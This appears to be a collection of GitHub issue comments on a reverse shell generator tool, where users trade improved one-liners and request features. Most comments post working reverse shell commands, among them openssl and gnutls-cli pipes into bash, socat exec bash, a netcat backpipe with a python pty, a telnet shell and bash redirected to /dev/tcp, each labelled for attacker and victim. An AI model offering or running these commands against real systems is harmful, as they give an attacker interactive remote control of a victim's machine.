Hello,
one of my favourite tools for reverse shell is openssl - present on many *nix platforms.

Attacker:
openssl req -x509 -sha256 -newkey rsa:4096 -keyout server.pem -out server.pem -days 10000 -nodes
openssl s_server -cert server.pem -port 8080

Victim:
rm -f /tmp/p; mkfifo /tmp/p ; openssl s_client -connect localhost:8080 -quiet 2>/dev/null 0</tmp/p | bash 1> /tmp/p

HI, It appears the "Usage Example" is archived. Please create a static version that can't be archived by a 3rd party so others can see the intended usage.

More info about retrieving your video below:
https://blog.asciinema.org/post/archival/

Far best option is to use socat for listening and hosting side:

attacker$ socat file:`tty`,raw,echo=0 tcp-listen:8080,fork

victim$   socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080,forever &

It is possible to use python pty module to switch the existing or new reverse shell session and have nearly terminal like experience:

python -c 'import pty; pty.spawn("/bin/bash")'

It can be executed in running netcat/telnet/bash session or directly at execution:

rm -f /tmp/backpipe; mkfifo /tmp/backpipe; nc 127.0.0.1 8080 </tmp/backpipe | python -c 'import pty; pty.spawn("/bin/bash")' 1>/tmp/backpipe 2>&1 &

It would be handy to have this snippet at hand in rsg.

Attacker:

certtool --generate-privkey --outfile gtlsserver.pem
certtool --generate-self-signed --load-privkey gtlsserver.pem  --outfile gtlsserver-cert.pem
socat `tty`,raw,echo=0 openssl-listen:8080,reuseaddr,cert=server.pem,verify=0

Victim (ignore first 32 lines):

rm -f /tmp/p ; mkfifo /tmp/p ;
gnutls-cli --debug=0 --insecure localhost:8080 0< /tmp/p | \
( head -n 32  > /dev/null ; bash -i ) 1>/tmp/p 2>&1

Some fixing of terminal is desired within the shell session:

python -c 'import pty; pty.spawn("/bin/bash")'
eval `resize`
reset

There is:

TELNET REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && telnet 127.0.0.1 8080 0/tmp/p

While there should be something like:

TELNET REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && telnet 127.0.0.1 8080 0</tmp/p | bash -i 1>/tmp/p

Hi

I'm using this, and it's really helpful, I thought of an idea that every one liner will get also a number and the user can select a number by typing it to the terminal and the listener will start and the content of the selected shell will be copied to the clipboard

Regards, Moshe

Invalid IP address with one of the examples

Hi,

A few years ago I made a pull request adding some QoL features, including being able to give an interface to listen on (#13). I didn't check again until I fixed the issue of nc listening on a random port on my fork, and then noticed that there was another commit from @CrossedWires after the PR that squashed being able to give an interface to listen on (ad0ac3a).

Why remove that option? Why can't it do both? In the end that commit also checked that the IP was bound to an an interface, so why not allow giving it an interface as well as an IP?

At the title says that ifconfig has been deprecated for a very long time and becoming less and less available on systems. Could there be a better way to do this?

Hey,

you might want to update the interactive bash version to support stderr :)

bash -i > /dev/tcp/127.0.0.1/12345 2>&1 <&1

i cannot see anything wrong with the code.
https://uploadi.ng/:)/🚩🪁👌🏩
https://uploadi.ng/:)/🥃👼💬🗿

https://cdn.upload.systems/uploads/KDhCAnaC.png
https://cdn.upload.systems/uploads/KpnK7n9O.png

Hello,
Not sure where to contact you for this, but im having issues with rsg where when I finish the command and it asks to open up a listener automatically, it doesnt connect when copying and pasting the command.